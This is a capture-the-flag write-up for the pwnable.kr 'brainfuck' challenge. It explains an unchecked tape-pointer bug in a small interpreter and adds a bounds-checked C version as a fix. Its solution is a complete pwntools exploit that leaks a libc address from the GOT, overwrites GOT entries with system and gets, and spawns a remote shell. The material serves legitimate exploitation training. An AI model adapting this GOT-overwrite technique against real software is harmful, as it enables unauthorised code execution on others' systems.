Pwnable.kr - brainfuck

Challenge

I made a simple brain-fuck language emulation program written in C.
The [ ] commands are not implemented yet. However, the rest of the functionality seems to be working fine.
Find a bug and exploit it to get a shell.

Download : http://pwnable.kr/bin/bf
Download : http://pwnable.kr/bin/bf_libc.so

Running at : nc pwnable.kr 9001

Analyze

  • Brain**** is a ****ing lovely programming language, like Whitespace, with only 8 operations: "<>-+.,[]". It is very interesting, though.
  • The point is to overwrite entries in the GOT (got.plt).
  • You need to find a way to call system() with a parameter of your choosing to get the shell.
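The payload in the Solution only works because '<' and '>' move the interpreter's data pointer without any bounds check, so ',' and '.' end up reading and writing memory far outside the tape (here, the GOT). As an added example, not the challenge binary's source and not the write-up's code, the following is what a fixed interpreter looks like in C: the position is kept as an index rather than a raw pointer, every move is checked against the tape length, and a loop-free program (the challenge has no [ ]) can be screened before it is run at all. TAPE_LEN, the function names and the error codes are assumptions for this example; the real binary's tape size is not stated on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TAPE_LEN 1024   /* assumed tape size for this example */

enum { BF_OK = 0, BF_ERR_OOB = -1, BF_ERR_OUTPUT = -2 };

/* Static pre-check for a program without '[' and ']': with no loops the
 * pointer path is fully determined by the text, so walk it once and reject
 * the program if any prefix would leave the tape. Returns 1 if safe, 0 if not. */
int bf_check_bounds(const char *prog)
{
  long pos = 0;
  for (; *prog; prog++) {
    if (*prog == '>') pos++;
    else if (*prog == '<') pos--;
    if (pos < 0 || pos >= TAPE_LEN) return 0;
  }
  return 1;
}

/* Run a loop-free brainfuck program on a zeroed tape.
 * input  : bytes consumed by ','; once exhausted, ',' stores 0.
 * out    : filled by '.', always NUL-terminated on return (out_cap > 0).
 * Returns BF_OK, BF_ERR_OOB if a move would leave the tape (execution stops
 * there, nothing outside the tape is ever touched), or BF_ERR_OUTPUT if the
 * output buffer is too small. The run-time check is kept even though
 * bf_check_bounds() exists, so a caller that skips the pre-check is still safe. */
int bf_run(const char *prog, const char *input, char *out, size_t out_cap)
{
  unsigned char tape[TAPE_LEN];
  size_t p = 0;          /* index into tape, never a raw pointer */
  size_t out_len = 0;

  if (out_cap == 0) return BF_ERR_OUTPUT;
  memset(tape, 0, sizeof tape);
  out[0] = '\0';

  for (const char *c = prog; *c; c++) {
    switch (*c) {
    case '>':
      if (p + 1 >= TAPE_LEN) return BF_ERR_OOB;   /* would step past the end */
      p++;
      break;
    case '<':
      if (p == 0) return BF_ERR_OOB;              /* would step before the start */
      p--;
      break;
    case '+': tape[p]++; break;
    case '-': tape[p]--; break;
    case '.':
      if (out_len + 1 >= out_cap) return BF_ERR_OUTPUT;
      out[out_len++] = (char)tape[p];
      out[out_len] = '\0';
      break;
    case ',':
      tape[p] = *input ? (unsigned char)*input++ : 0;
      break;
    default:
      break;   /* '[' and ']' are unimplemented, other bytes are ignored */
    }
  }
  return BF_OK;
}

/* Convenience wrapper: returns the program's output, or NULL on any error.
 * The status of the last call is available through bf_last_status(). */
static int last_status = BF_OK;

const char *bf_output(const char *prog, const char *input)
{
  static char out[256];
  last_status = bf_run(prog, input, out, sizeof out);
  return last_status == BF_OK ? out : NULL;
}

int bf_last_status(void) { return last_status; }

int main(void)
{
  /* constructed sample programs: one well-behaved, one that walks off the tape */
  const char *good = ",>,<.>.";   /* read two bytes, print them back in order */
  const char *bad  = "<.";        /* move below cell 0, then try to print */

  printf("good: check=%d output=\"%s\"\n", bf_check_bounds(good), bf_output(good, "xy"));
  printf("bad:  check=%d run=%s (status %d)\n", bf_check_bounds(bad),
         bf_output(bad, "") ? "ok" : "rejected", bf_last_status());
  return 0;
}
```

The pre-check is only sound because the language subset has no loops; once [ ] exist the pointer path depends on data, and the run-time check in bf_run() is the one that matters.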

Solution

from pwn import *

DEBUG = 0
if DEBUG == 1:
  p = process('./bf')
else:
  p = remote('pwnable.kr', 9001)
libc = ELF('./bf_libc.so')   # libc shipped with the challenge, used only for symbol offsets

a_tape = 0x0804a0a0            # start of the interpreter's tape (initial value of p)
a_main = 0x08048671            # address of main()
a_gotplt_fgets = 0x0804a010    # GOT entries to leak from / overwrite
a_gotplt_memset = 0x0804a02c
a_gotplt_putchar = 0x0804a030

cp = a_tape  # current position of the tape pointer, tracked on our side

def mp(f, t):
  """Return the '<'/'>' sequence that moves the tape pointer from f to t, and update cp."""
  global cp
  cp = cp + (t - f)
  if t > f:
    return '>' * (t - f)
  else:
    return '<' * (f - t)

# ',' stores one byte from stdin into the current cell; '.' prints the current cell.
write = ',>' * 4 + '<' * 4                  # overwrite 4 bytes at p, then return to the same cell
leakandwrite = '.>' * 4 + '<' * 4 + write   # print the 4 bytes at p first, then overwrite them

payload = mp(cp, a_gotplt_fgets)
payload += leakandwrite              # leak fgets@got, then replace it with system
payload += mp(cp, a_gotplt_memset)
payload += write                     # memset@got <- gets
payload += mp(cp, a_gotplt_putchar)
payload += write                     # putchar@got <- main
payload += '.'                       # call putchar, which is now main: the program restarts

print(p.recvline_startswith('type'))
p.sendline(payload)

# The 4 leaked bytes are little-endian: u32() is the same as reversing them
# with [::-1] and parsing the hex string.
a_fgets = u32(p.recvn(4))
a_gets = a_fgets + (libc.symbols['gets'] - libc.symbols['fgets'])
a_system = a_fgets + (libc.symbols['system'] - libc.symbols['fgets'])

p.send(p32(a_system))   # consumed by the four ',' at fgets@got
p.send(p32(a_gets))     # memset@got
p.send(p32(a_main))     # putchar@got
p.sendline('/bin/sh')   # read by gets() (was memset), then passed to system() (was fgets)

p.interactive()

  • Notice: when sending the addresses in the very last lines, you need to use send() rather than sendline(), because each ',' consumes exactly one byte and a trailing newline would become the first byte of the next address.
  • Also notice: you can of course read the 'actual' addresses inside got.plt from the binary you downloaded, but don't use those values, because they change when the program starts to run. Instead, you should leak their values dynamically with the '.' operation.

References

[pwnable.kr] Rookiss Write-Up

[systemoverlord.com] GOT and PLT for pwning

[Airs - Ian Lance Taylor] blog series about linkers and loaders

[stackoverflow] Python slice notation [::-1]